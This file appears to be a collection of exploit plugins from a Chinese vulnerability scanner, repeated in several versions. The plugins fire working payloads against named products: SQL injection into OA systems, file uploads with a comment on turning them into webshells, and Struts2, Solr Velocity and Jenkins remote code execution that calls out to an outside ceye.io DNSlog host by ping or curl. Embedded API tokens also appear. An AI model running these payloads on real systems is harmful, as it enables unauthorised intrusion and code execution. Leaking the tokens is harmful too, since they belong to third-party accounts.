def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 Medusas = [] try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } #s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp == None: resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if con.lower().find('bbbmicrosoft') != -1: Medusa = "{} 存在用友FE协作办公平台5.5 SQL注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) Medusas.append(str(Medusa)) except Exception as e: pass try: payload_url2 = scheme + "://" + url + payload2 headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } start_time = time.time() #s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.get(payload_url2, headers=headers, proxies=proxies, timeout=6, verify=False) elif ProxyIp == None: resp = requests.get(payload_url2, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if time.time() - start_time >= 6: Medusa = "{} 存在用友FE协作办公平台5.5 SQL注入漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url2) Medusas.append(str(Medusa)) _t = VulnerabilityInfo(Medusas) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 Medusas_str = '' for i in Medusas: Medusas_str = Medusas_str + i return (str(Medusas_str)) except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 Medusas = [] try: for turl in urls: payload_url = scheme + "://" + url + turl + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } #s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp == None: resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 500 and con.lower().find('gqxmicrosoft') != -1: Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) Medusas.append(str(Medusa)) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (_t.info) except: logging.warning(Url) _ = VulnerabilityInfo('') logging.warning(_.info.get('parameter')) try: payload_url = scheme + "://" + url + "/include/get_user.aspx" headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } #s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) elif ProxyIp == None: resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if con.lower().find('button_normal') != -1: Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url) Medusas.append(str(Medusa)) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (_t.info) except: logging.warning(Url) _ = VulnerabilityInfo('') logging.warning(_.info.get('parameter')) _t = VulnerabilityInfo(Medusas) return (_t.info)
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 try: payload = "/library/editornew/Editor/img_save.asp" payload_url = scheme + "://" + url + ":" + str(port) + payload data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert testvul ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- ''' headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() # if ProxyIp!=None: # proxies = { # # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// # "http": "http://" + str(ProxyIp) # } # resp = s.post(payload_url,data=data,headers=headers, timeout=6, proxies=proxies,verify=False) # elif ProxyIp==None: resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con) if match: payload_url2 = scheme + "://" + url + ":" + str( port) + "/library/editornew/Editor/NewImage/" + match.group(1) resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) con2 = resp2.text code2 = resp2.status_code #如果要上传shell直接把testvul这个值改为一句话就可以 if code2 == 200 and con2.lower().find("testvul") != -1: Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload_url = scheme + "://" + url + ':' + str(port) + '/orders/3/edit' host = url + ':' + str(port) payload = ''' <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>ping</string> <string>{}.S2052.7ktb2x.ceye.io</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map> '''.format(url) headers = { 'Host': host, 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Connection': 'close', 'Content-Type': 'application/xml', } try: s = requests.session() resp = s.post(payload_url, data=payload, headers=headers, timeout=5, verify=False) ceyeurl = 'http://api.ceye.io/v1/records?token=f84734983a259c598a1edeb772981d14&type=dns&filter=' time.sleep(5) ceye_content = requests.get(ceyeurl, timeout=3) flag = "{}.S2052".format(url) if flag in ceye_content: Medusa = "{}存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:Struts2_1_2-Struts2_3_33,Struts2_5-Struts2_5_12\r\nPayload:{}\r\nPost:{}\r\n".format( url, payload_url, payload) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") #获取传入的url参数 Headers = kwargs.get("Headers") #获取传入的头文件 proxies = kwargs.get("Proxies") #获取传入的代理参数 try: Headers1 = Headers Headers1['Content-Type'] = 'application/x-www-form-urlencoded' payload_url = url + '/solr/admin/cores' step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=Headers1).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/" + name + "/config" DL = ClassCongregation.Dnslog() payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format( DL.dns_host()) payload_url1 = url + payload payload_url2 = url + payload2 payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }""" Headers2 = Headers Headers2['Content-Type'] = 'application/json' resp = requests.post(payload_url1, data=payload_data, headers=Headers2, proxies=proxies, timeout=6, verify=False) resp2 = requests.get(payload_url2, headers=Headers1, timeout=6, proxies=proxies, verify=False) con2 = resp2.text if DL.result(): Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format( url, con2, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: RD = ClassCongregation.randoms().result(20) payload = "/library/editornew/Editor/img_save.asp" payload_url = url + payload data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert {} ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''.format(RD).encode('utf-8') Headers['Content-Type'] = 'application/x-www-form-urlencoded' Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con) if match: payload_url2 = url + "/library/editornew/Editor/NewImage/" + match.group( 1) resp2 = requests.get(payload_url2, headers=Headers, timeout=6, proxies=proxies, verify=False) con2 = resp2.text code2 = resp2.status_code #如果要上传shell直接把testvul这个值改为一句话就可以 if code2 == 200 and con2.lower().find(RD) != -1: Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp2, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload1 = "/base/post.php" payload_url1 = scheme + '://' + url + ':' + str(port) + payload1 dada = "act=appcode" payload2 = "/base/appfile.php" payload_url2 = scheme + '://' + url + ':' + str(port) + payload2 ran = ranstr(10) payload_url3 = scheme + '://' + url + ':' + str( port) + "/effect/source/bg/{}.txt".format(ran) headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', } headers2 = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE', } resp = requests.post(payload_url1, data=dada, proxies=proxies, headers=headers, timeout=5, verify=False) con = resp.text k = re.match('k=(.*?)&', con, re.M | re.I).group(1) # 提取K的值 md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest() dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en) resp2 = requests.post(payload_url2, data=dada2, proxies=proxies, headers=headers2, timeout=5, verify=False) resp3 = requests.get(payload_url3, headers=headers, proxies=proxies, timeout=5, verify=False) code3 = resp3.status_code con3 = resp3.text if code3 == 200 and con3.find(ran) != -1: Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url2, dada2, payload_url3, con3) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名 #medusa("http://192.168.0.142","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 try: payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333" payload_url = scheme + "://" + url + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = s.post(payload_url, data={ 'formids': '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1' }, headers=headers, timeout=6, proxies=proxies, verify=False) elif ProxyIp == None: resp = s.post(payload_url, data={ 'formids': '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1' }, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.lower( ).find('''"draggable":''') != -1 and con.lower( ).find('''"checked":''') != -1 and con.lower().find( '''"id":''') != -1 and con.lower().find('''"text":''') != -1: Medusa = "{} 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format( url, payload_url, '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1') _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (_t.info) except: logging.warning(Url) _ = VulnerabilityInfo('') logging.warning(_.info.get('parameter'))
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url = scheme + "://" + url + ":" + str( port) + '/solr/admin/cores' step1 = requests.get(payload_url, timeout=6, headers=headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/" + name + "/config" ran = ranstr(10) payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}.mdtx4t.ceye.io%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format( ran) payload_url1 = scheme + "://" + url + ":" + str(port) + payload payload_url2 = scheme + "://" + url + ":" + str(port) + payload2 payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }""" headers1 = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate', } resp = requests.post(payload_url1, data=payload_data, headers=headers1, timeout=6, verify=False) resp2 = requests.get(payload_url2, headers=headers, timeout=6, verify=False) dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=dns&filter=' time.sleep(5) resp3 = requests.get(dnslog, timeout=5, verify=False) con2 = resp2.text con3 = resp3.text if con3.find(ran) != -1: Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\n回显内容:{}\r\nDNSlog:{}\r\n".format( url, con2, con3) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port for turl in urls: try: payload_url = scheme + "://" + url + turl + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 500 and con.lower().find('gqxmicrosoft') != -1: Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类 try: payload_url = scheme + "://" + url + ':' + str( port) + "/include/get_user.aspx" headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False) con = resp.text if con.lower().find('button_normal') != -1: Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url) ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp=None): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 ran = ranstr(10) post_data = '''script%3dprintln+%22ping+%7b%7d.mdtx4t.ceye.io%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+%7b%7d.mdtx4t.ceye.io%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format( ran, ran) payload = "/script" try: payload_url = scheme + "://" + url + ':' + str(port) + payload s = requests.session() cookises = re.compile('.*Cookie (.*) for.*').findall( str(s.get(payload_url).cookies))[0] #正则匹配获取的Cookie字符串 print(cookises) headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Cookis': cookises } if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = s.post(payload_url, headers=headers, data=post_data, timeout=6, proxies=proxies, verify=False) elif ProxyIp == None: resp = s.post(payload_url, headers=headers, data=post_data, timeout=6, verify=False) dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=http&filter=' time.sleep(5) resp2 = requests.get(dnslog, timeout=5, verify=False) con = resp.text con2 = resp2.text if con.find(ran) != -1: Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog{}\r\n".format( url, payload_url, con, con2) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) #调用写入类 #medusa('http://120.26.60.154:8080','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 try: payload = "/search.php" payload_url = scheme + "://" + url + ":" + str(port) + payload payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();" headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': scheme + '://' + url, 'Referer': payload } s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = s.post(payload_url, headers=headers, data=payload_data, timeout=6, proxies=proxies, verify=False) elif ProxyIp == None: resp = s.post(payload_url, headers=headers, data=payload_data, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('System') != -1 and con.find( 'Compiler' ) != -1 and con.find('Build Date') != -1 and con.find( 'IPv6 Support') != -1 and con.find('Configure Command') != -1: Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url, con.encode(encoding='utf-8')) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类 #medusa('http://192.168.0.146','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/4')
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 try: ran = ranstr(10) a = '''public class x { public x(){ "curl %s.mdtx4t.ceye.io".execute() } }''' % ran payload2 = urllib.parse.quote(a) # url编码 payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=" payload_url = scheme + "://" + url + ':' + str( port) + payload1 + payload2 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) elif ProxyIp == None: resp = requests.post(payload_url, headers=headers, timeout=6, verify=False) dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=dns&filter=' time.sleep(5) resp2 = requests.get(dnslog, timeout=5, verify=False) con = resp.text con2 = resp2.text if con.find(ran) != -1: Medusa = "{}Jenkins远程命令执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog{}\r\n".format( url, payload_url, con, con2) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) #调用写入类
